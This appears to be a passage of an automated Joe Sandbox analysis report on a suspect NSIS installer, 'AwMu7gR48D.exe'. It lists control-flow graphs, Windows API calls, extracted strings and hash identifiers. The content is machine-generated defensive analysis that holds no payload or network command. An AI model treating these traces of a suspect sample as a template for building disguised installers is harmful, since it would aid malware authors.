                                                                              • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405768
                                                                              • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405789
                                                                              • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040578F
                                                                              • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A0
                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040584D
                                                                              • FindClose.KERNEL32(00000000), ref: 0040585E
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 004056F7
                                                                              • \*.*, xrefs: 00405762
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405704
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-3426257497
                                                                              • Opcode ID: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
                                                                              • Instruction ID: 5202cdaf7196988d1da3935d2d892696f3640e5f60657e92f8c59f35d89726bd
                                                                              • Opcode Fuzzy Hash: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
                                                                              • Instruction Fuzzy Hash: 02519F32800A04BADB217B618C45BAF7B78DF42754F14847BF851761D2D73C8A92DEAE

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 759 4065bb-4065c0 760 406631-40664f 759->760 761 4065c2-4065f1 759->761 764 406c27-406c3c 760->764 762 4065f3-4065f6 761->762 763 4065f8-4065fc 761->763 767 406608-40660b 762->767 768 406604 763->768 769 4065fe-406602 763->769 765 406c56-406c6c 764->765 766 406c3e-406c54 764->766 770 406c6f-406c76 765->770 766->770 771 406629-40662c 767->771 772 40660d-406616 767->772 768->767 769->767 773 406c78-406c7c 770->773 774 406c9d-406ca9 770->774 777 4067fe-40681c 771->777 775 406618 772->775 776 40661b-406627 772->776 778 406c82-406c9a 773->778 779 406e2b-406e35 773->779 788 40643f-406448 774->788 775->776 783 406691-4066bf 776->783 780 406834-406846 777->780 781 40681e-406832 777->781 778->774 787 406e41-406e54 779->787 786 406849-406853 780->786 781->786 784 4066c1-4066d9 783->784 785 4066db-4066f5 783->785 789 4066f8-406702 784->789 785->789 792 406855 786->792 793 4067f6-4067fc 786->793 794 406e59-406e5d 787->794 790 406e56 788->790 791 40644e 788->791 796 406708 789->796 797 406679-40667f 789->797 790->794 798 406455-406459 791->798 799 406595-4065b6 791->799 800 4064fa-4064fe 791->800 801 40656a-40656e 791->801 802 4067d1-4067d5 792->802 803 406966-406973 792->803 793->777 795 40679a-4067a4 793->795 804 406de9-406df3 795->804 805 4067aa-4067cc 795->805 822 406dc5-406dcf 796->822 823 40665e-406676 796->823 806 406732-406738 797->806 807 406685-40668b 797->807 798->787 814 40645f-40646c 798->814 799->764 808 406504-40651d 800->808 809 406daa-406db4 800->809 815 406574-406588 801->815 816 406db9-406dc3 801->816 810 4067db-4067f3 802->810 811 406ddd-406de7 802->811 803->788 813 4069c2-4069d1 803->813 804->787 805->803 817 406796 806->817 818 40673a-406758 806->818 807->783 807->817 820 406520-406524 808->820 809->787 810->793 811->787 813->764 814->790 819 406472-4064b8 814->819 821 40658b-406593 815->821 816->787 817->795 825 406770-406782 818->825 826 40675a-40676e 818->826 827 4064e0-4064e2 819->827 828 4064ba-4064be 819->828 820->800 824 406526-40652c 820->824 821->799 821->801 822->787 823->797 834 406556-406568 824->834 835 40652e-406535 824->835 829 406785-40678f 825->829 826->829 832 4064f0-4064f8 827->832 833 4064e4-4064ee 827->833 830 4064c0-4064c3 GlobalFree 828->830 831 4064c9-4064d7 GlobalAlloc 828->831 829->806 838 406791 829->838 830->831 831->790 839 4064dd 831->839 832->820 833->832 833->833 834->821 836 406540-406550 GlobalAlloc 835->836 837 406537-40653a GlobalFree 835->837 836->790 836->834 837->836 841 406dd1-406ddb 838->841 842 406717-40672f 838->842 839->827 841->787 842->806
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
                                                                              • Instruction ID: 82117b2ed1b037f842d7e8ec4a077ce5a2ba4b06f200654bc1e2ca7552b06de8
                                                                              • Opcode Fuzzy Hash: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
                                                                              • Instruction Fuzzy Hash: BCF16474D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                              APIs
                                                                              • FindFirstFileA.KERNELBASE(76F93410,00421558,C:\Users\user\AppData\Local\Temp\nspE492.tmp,004059F8,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 0040623D
                                                                              • FindClose.KERNEL32(00000000), ref: 00406249
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nspE492.tmp, xrefs: 00406232
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nspE492.tmp
                                                                              • API String ID: 2295610775-2162577230
                                                                              • Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                                                              • Instruction ID: 7cf403c7a0a34fa6c1bdd97e039e734b9fb45dc45bcdba9fead32da54c1b9644
                                                                              • Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                                                              • Instruction Fuzzy Hash: 19D0C9329090206BC3106628AC0C84B6A599B953717118A76B56AF12E0D238986286A9

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 185 403b1c-403b2e 186 403b34-403b3a 185->186 187 403c6f-403c7e 185->187 186->187 188 403b40-403b49 186->188 189 403c80-403cc8 GetDlgItem * 2 call 403ff0 SetClassLongA call 40140b 187->189 190 403ccd-403ce2 187->190 193 403b4b-403b58 SetWindowPos 188->193 194 403b5e-403b61 188->194 189->190 191 403d22-403d27 call 40403c 190->191 192 403ce4-403ce7 190->192 204 403d2c-403d47 191->204 196 403ce9-403cf4 call 401389 192->196 197 403d1a-403d1c 192->197 193->194 199 403b63-403b75 ShowWindow 194->199 200 403b7b-403b81 194->200 196->197 218 403cf6-403d15 SendMessageA 196->218 197->191 203 403fbd 197->203 199->200 205 403b83-403b98 DestroyWindow 200->205 206 403b9d-403ba0 200->206 211 403fbf-403fc6 203->211 209 403d50-403d56 204->209 210 403d49-403d4b call 40140b 204->210 212 403f9a-403fa0 205->212 214 403ba2-403bae SetWindowLongA 206->214 215 403bb3-403bb9 206->215 221 403f7b-403f94 DestroyWindow EndDialog 209->221 222 403d5c-403d67 209->222 210->209 212->203 220 403fa2-403fa8 212->220 214->211 216 403c5c-403c6a call 404057 215->216 217 403bbf-403bd0 GetDlgItem 215->217 216->211 223 403bd2-403be9 SendMessageA IsWindowEnabled 217->223 224 403bef-403bf2 217->224 218->211 220->203 226 403faa-403fb3 ShowWindow 220->226 221->212 222->221 227 403d6d-403dba call 405f51 call 403ff0 * 3 GetDlgItem 222->227 223->203 223->224 228 403bf4-403bf5 224->228 229 403bf7-403bfa 224->229 226->203 255 403dc4-403e00 ShowWindow KiUserCallbackDispatcher call 404012 EnableWindow 227->255 256 403dbc-403dc1 227->256 232 403c25-403c2a call 403fc9 228->232 233 403c08-403c0d 229->233 234 403bfc-403c02 229->234 232->216 237 403c43-403c56 SendMessageA 233->237 239 403c0f-403c15 233->239 234->237 238 403c04-403c06 234->238 237->216 238->232 243 403c17-403c1d call 40140b 239->243 244 403c2c-403c35 call 40140b 239->244 253 403c23 243->253 244->216 252 403c37-403c41 244->252 252->253 253->232 259 403e02-403e03 255->259 260 403e05 255->260 256->255 261 403e07-403e35 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e37-403e48 SendMessageA 261->262 263 403e4a 261->263 264 403e50-403e8a call 404025 call 403afd call 405f2f lstrlenA call 405f51 SetWindowTextA call 401389 262->264 263->264 264->204 275 403e90-403e92 264->275 275->204 276 403e98-403e9c 275->276 277 403ebb-403ecf DestroyWindow 276->277 278 403e9e-403ea4 276->278 277->212 279 403ed5-403f02 CreateDialogParamA 277->279 278->203 280 403eaa-403eb0 278->280 279->212 281 403f08-403f5f call 403ff0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->204 282 403eb6 280->282 281->203 287 403f61-403f74 ShowWindow call 40403c 281->287 282->203 289 403f79 287->289 289->212
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B58
                                                                              • ShowWindow.USER32(?), ref: 00403B75
                                                                              • DestroyWindow.USER32 ref: 00403B89
                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA5
                                                                              • GetDlgItem.USER32(?,?), ref: 00403BC6
                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BDA
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403BE1
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403C8F
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403C99
                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB3
                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D04
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403DAA
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403DCB
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDD
                                                                              • EnableWindow.USER32(?,?), ref: 00403DF8
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0E
                                                                              • EnableMenuItem.USER32(00000000), ref: 00403E15
                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2D
                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E40
                                                                              • lstrlenA.KERNEL32(Solidariseringerne Setup: Completed,?,Solidariseringerne Setup: Completed,00000000), ref: 00403E6A
                                                                              • SetWindowTextA.USER32(?,Solidariseringerne Setup: Completed), ref: 00403E79
                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403FAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID: Solidariseringerne Setup: Completed
                                                                              • API String ID: 3282139019-345998224
                                                                              • Opcode ID: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
                                                                              • Instruction ID: f34c7ad61b4b1b4f5354d92f7eace51acccef8372a8e2d808ca2954a926f6951
                                                                              • Opcode Fuzzy Hash: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
                                                                              • Instruction Fuzzy Hash: 65C1B171A04205BBDB216F61ED45E2B7E7CFB45706F40443EF601B11E1C779A942AB2E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 290 40377f-403797 call 4062c7 293 403799-4037a9 call 405e8d 290->293 294 4037ab-4037dc call 405e16 290->294 302 4037ff-403828 call 403a44 call 4059b5 293->302 298 4037f4-4037fa lstrcatA 294->298 299 4037de-4037ef call 405e16 294->299 298->302 299->298 308 40382e-403833 302->308 309 4038af-4038b7 call 4059b5 302->309 308->309 310 403835-403859 call 405e16 308->310 314 4038c5-4038ea LoadImageA 309->314 315 4038b9-4038c0 call 405f51 309->315 310->309 320 40385b-40385d 310->320 318 40396b-403973 call 40140b 314->318 319 4038ec-40391c RegisterClassA 314->319 315->314 333 403975-403978 318->333 334 40397d-403988 call 403a44 318->334 323 403922-403966 SystemParametersInfoA CreateWindowExA 319->323 324 403a3a 319->324 321 40386e-40387a lstrlenA 320->321 322 40385f-40386c call 4058f2 320->322 328 4038a2-4038aa call 4058c7 call 405f2f 321->328 329 40387c-40388a lstrcmpiA 321->329 322->321 323->318 327 403a3c-403a43 324->327 328->309 329->328 332 40388c-403896 GetFileAttributesA 329->332 336 403898-40389a 332->336 337 40389c-40389d call 40590e 332->337 333->327 343 403a11-403a12 call 405128 334->343 344 40398e-4039a8 ShowWindow call 406259 334->344 336->328 336->337 337->328 347 403a17-403a19 343->347 351 4039b4-4039c6 GetClassInfoA 344->351 352 4039aa-4039af call 406259 344->352 349 403a33-403a35 call 40140b 347->349 350 403a1b-403a21 347->350 349->324 350->333 357 403a27-403a2e call 40140b 350->357 355 4039c8-4039d8 GetClassInfoA RegisterClassA 351->355 356 4039de-403a01 DialogBoxParamA call 40140b 351->356 352->351 355->356 360 403a06-403a0f call 4036cf 356->360 357->333 360->327
                                                                              APIs
                                                                                • Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
                                                                                • Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4
                                                                              • lstrcatA.KERNEL32(1033,Solidariseringerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Solidariseringerne Setup: Completed,00000000,00000002,76F93410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\AwMu7gR48D.exe",00000000), ref: 004037FA
                                                                              • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Solidariseringerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Solidariseringerne Setup: Completed,00000000,00000002,76F93410), ref: 0040386F
                                                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
                                                                              • GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
                                                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
                                                                                • Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A
                                                                              • RegisterClassA.USER32(00422EA0), ref: 00403913
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040392B
                                                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403960
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403996
                                                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039C2
                                                                              • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039CF
                                                                              • RegisterClassA.USER32(00422EA0), ref: 004039D8
                                                                              • DialogBoxParamA.USER32(?,00000000,00403B1C,00000000), ref: 004039F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Solidariseringerne Setup: Completed$_Nb
                                                                              • API String ID: 1975747703-567170757
                                                                              • Opcode ID: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
                                                                              • Instruction ID: d12dedd32edb2aff813830401e41f02ecd086126c72271397d80de36ce2b18ee
                                                                              • Opcode Fuzzy Hash: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
                                                                              • Instruction Fuzzy Hash: 1E61C6B1744240BEE620BF669D45F373AACEB84759F40447EF940B22E2D77C9D029A2D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 364 402d48-402d96 GetTickCount GetModuleFileNameA call 405ac8 367 402da2-402dd0 call 405f2f call 40590e call 405f2f GetFileSize 364->367 368 402d98-402d9d 364->368 376 402dd6 367->376 377 402ebd-402ecb call 402ce4 367->377 369 402f7a-402f7e 368->369 379 402ddb-402df2 376->379 384 402f20-402f25 377->384 385 402ecd-402ed0 377->385 381 402df4 379->381 382 402df6-402dff call 40315d 379->382 381->382 389 402e05-402e0c 382->389 390 402f27-402f2f call 402ce4 382->390 384->369 387 402ed2-402eea call 403173 call 40315d 385->387 388 402ef4-402f1e GlobalAlloc call 403173 call 402f81 385->388 387->384 411 402eec-402ef2 387->411 388->384 415 402f31-402f42 388->415 393 402e88-402e8c 389->393 394 402e0e-402e22 call 405a83 389->394 390->384 398 402e96-402e9c 393->398 399 402e8e-402e95 call 402ce4 393->399 394->398 413 402e24-402e2b 394->413 406 402eab-402eb5 398->406 407 402e9e-402ea8 call 40637e 398->407 399->398 406->379 414 402ebb 406->414 407->406 411->384 411->388 413->398 417 402e2d-402e34 413->417 414->377 418 402f44 415->418 419 402f4a-402f4f 415->419 417->398 420 402e36-402e3d 417->420 418->419 421 402f50-402f56 419->421 420->398 423 402e3f-402e46 420->423 421->421 422 402f58-402f73 SetFilePointer call 405a83 421->422 426 402f78 422->426 423->398 425 402e48-402e68 423->425 425->384 427 402e6e-402e72 425->427 426->369 428 402e74-402e78 427->428 429 402e7a-402e82 427->429 428->414 428->429 429->398 430 402e84-402e86 429->430 430->398
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402D59
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\AwMu7gR48D.exe,00000400), ref: 00402D75
                                                                                • Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405ACC
                                                                                • Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE
                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\AwMu7gR48D.exe,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00402DC1
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00402D98
                                                                              • "C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 00402D48
                                                                              • Null, xrefs: 00402E3F
                                                                              • C:\Users\user\Desktop\AwMu7gR48D.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
                                                                              • C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
                                                                              • Inst, xrefs: 00402E2D
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
                                                                              • soft, xrefs: 00402E36
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\AwMu7gR48D.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                              • API String ID: 4283519449-899594266
                                                                              • Opcode ID: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
                                                                              • Instruction ID: ef8309496f7f1060f742aea9483ad6a943d4cc908664d4bedc23fec409a9c2f2
                                                                              • Opcode Fuzzy Hash: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
                                                                              • Instruction Fuzzy Hash: F251D5B1A40215ABDF209F65DE89B9E7AB8FB04355F10413BE900B62D1C7BC9E418B9D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 431 405f51-405f5c 432 405f5e-405f6d 431->432 433 405f6f-405f85 431->433 432->433 434 406176-40617a 433->434 435 405f8b-405f96 433->435 436 406180-40618a 434->436 437 405fa8-405fb2 434->437 435->434 438 405f9c-405fa3 435->438 440 406195-406196 436->440 441 40618c-406190 call 405f2f 436->441 437->436 439 405fb8-405fbf 437->439 438->434 442 405fc5-405ff9 439->442 443 406169 439->443 441->440 445 406116-406119 442->445 446 405fff-406009 442->446 447 406173-406175 443->447 448 40616b-406171 443->448 451 406149-40614c 445->451 452 40611b-40611e 445->452 449 406023 446->449 450 40600b-40600f 446->450 447->434 448->434 456 40602a-406031 449->456 450->449 453 406011-406015 450->453 457 40615a-406167 lstrlenA 451->457 458 40614e-406155 call 405f51 451->458 454 406120-40612c call 405e8d 452->454 455 40612e-40613a call 405f2f 452->455 453->449 459 406017-40601b 453->459 469 40613f-406145 454->469 455->469 461 406033-406035 456->461 462 406036-406038 456->462 457->434 458->457 459->449 465 40601d-406021 459->465 461->462 467 406071-406074 462->467 468 40603a-406055 call 405e16 462->468 465->456 470 406084-406087 467->470 471 406076-406082 GetSystemDirectoryA 467->471 477 40605a-40605d 468->477 469->457 473 406147 469->473 475 4060f4-4060f6 470->475 476 406089-406097 GetWindowsDirectoryA 470->476 474 4060f8-4060fb 471->474 478 40610e-406114 call 406199 473->478 474->478 482 4060fd-406101 474->482 475->474 480 406099-4060a3 475->480 476->475 481 406063-40606c call 405f51 477->481 477->482 478->457 485 4060a5-4060a8 480->485 486 4060bd-4060d3 SHGetSpecialFolderLocation 480->486 481->474 482->478 483 406103-406109 lstrcatA 482->483 483->478 485->486 489 4060aa-4060b1 485->489 490 4060f1 486->490 491 4060d5-4060ef SHGetPathFromIDListA CoTaskMemFree 486->491 492 4060b9-4060bb 489->492 490->475 491->474 491->490 492->474 492->486
                                                                              APIs
                                                                              • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 0040607C
                                                                              • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,0040508E,Completed,00000000), ref: 0040608F
